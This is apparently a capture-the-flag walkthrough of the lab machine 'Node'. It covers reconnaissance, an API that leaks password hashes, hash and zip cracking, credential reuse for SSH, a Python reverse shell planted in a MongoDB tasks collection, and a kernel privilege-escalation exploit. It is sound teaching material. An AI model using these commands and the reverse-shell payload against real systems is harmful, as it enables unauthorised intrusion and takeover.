NODE

Let's start with an Nmap scan (-oN writes normal output to a file; the bare -o is not a valid nmap option):
nmap -sV -sC -O -T4 -Pn -oN result.txt 10.129.31.121

Port 3000 is open and serves a web application with a welcome page and a login panel.


Examining the source of the login page and following every script and endpoint it references shows that user credentials are exposed by an API endpoint, without logging in:

- /login
- /login loads /assets/js/app/controllers/home.js
- /assets/js/app/controllers/home.js calls /api/users/latest
- /api/users/latest returns user records, including usernames and password hashes


Walking one level up the path, /api/users returns the full user list, including the admin account.

Let's crack the password hashes, starting with the admin user. First we need to identify the hash type: the 64-character hex digests are SHA-256, and https://crackstation.net both identifies the type and cracks the admin hash (its password is manchester).
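The same wordlist attack the hashes fall to, as an added example (not code from the original write-up): because the hashes are unsalted SHA-256, one digest per candidate word is enough to match every user at once. The user list and wordlist below are constructed stand-ins for the box's /api/users JSON and rockyou.txt; only the word "manchester" comes from the write-up above, the usernames "bob" and "nobody" and their passwords are made up for the example.

```python
import hashlib
import json
import re

# Constructed sample in the shape of the /api/users response (username, hex password hash, is_admin).
# The hashes are computed here from the candidate words, not copied from the box.
SAMPLE_USERS = json.dumps([
    {"username": "admin",  "password": hashlib.sha256(b"manchester").hexdigest(), "is_admin": True},
    {"username": "bob",    "password": hashlib.sha256(b"qwerty").hexdigest(), "is_admin": False},
    {"username": "nobody", "password": hashlib.sha256(b"not-in-any-wordlist-9f3").hexdigest(), "is_admin": False},
])

# Constructed stand-in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "manchester", "qwerty", "letmein"]

HEX_SHA256 = re.compile(r"^[0-9a-f]{64}$")


def hash_kind(digest):
    """Guess an unsalted hex digest's algorithm from its length, the same heuristic crackstation applies."""
    return {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}.get(len(digest), "unknown")


def crack(users_json, wordlist):
    """Return {username: password} for every SHA-256 hash that matches a wordlist entry.

    Hashing the wordlist once and looking each user's digest up in the table works only
    because the hashes are unsalted; with per-user salts every user would need its own pass.
    """
    lookup = {hashlib.sha256(word.encode()).hexdigest(): word for word in wordlist}
    found = {}
    for user in json.loads(users_json):
        digest = user["password"].lower()
        if not HEX_SHA256.match(digest):
            continue  # not a SHA-256 hex digest; skip rather than mis-crack it
        if digest in lookup:
            found[user["username"]] = lookup[digest]
    return found


if __name__ == "__main__":
    for name, password in crack(SAMPLE_USERS, SAMPLE_WORDLIST).items():
        print(f"{name}: {password}")
```

Users whose password is not in the wordlist (here "nobody") simply do not appear in the result; that is the case to watch for before assuming a login will work.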

Let's verify the manchester hash on Kali (sha256sum, not sha256s; -n keeps echo from appending a newline that would change the digest):
echo -n "manchester" | sha256sum
After logging in as the admin user, the admin area offers a backup download. The file is base64-encoded; decoding it yields a zip archive (myplace-decoded.backup).


The archive is password-protected, so let's crack it with fcrackzip (-D dictionary mode, -p the wordlist, -u to verify candidates by actually unzipping):

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace-decoded.backup

The password is found, and the extracted application files contain MongoDB credentials.

I noted these credentials and tried them elsewhere: mark's MongoDB password is reused for his system account, so it also works for SSH.
ssh mark@10.129.31.121
password 5AYRft73VtFpc84k

Connecting to MongoDB with the same credentials, the tasks collection has no documents. Let's add one whose cmd field is a Python reverse shell pointing at our attack machine. Start the listener first (the payload and the listener must use the same port; 8888 here):
nc -nlvp 8888
---
# insert a document that contains a reverse shell
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.77\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})
# double check that the document got added properly
db.tasks.find()

There are several privilege escalation paths on this box, but most of them are fairly involved, so I took the easy way.
The machine runs Ubuntu on a 4.4.0 kernel that is vulnerable to a known local privilege escalation (Exploit-DB 44298, the Linux kernel < 4.4.0-116 / Ubuntu 16.04.4 exploit). Confirm the exact kernel version with uname -r before relying on it: a kernel exploit run against the wrong version can crash the target. Get the C source, transfer it to the target machine, and compile it there:

gcc 44298.c -o shell
chmod +x shell
./shell
and we are root.
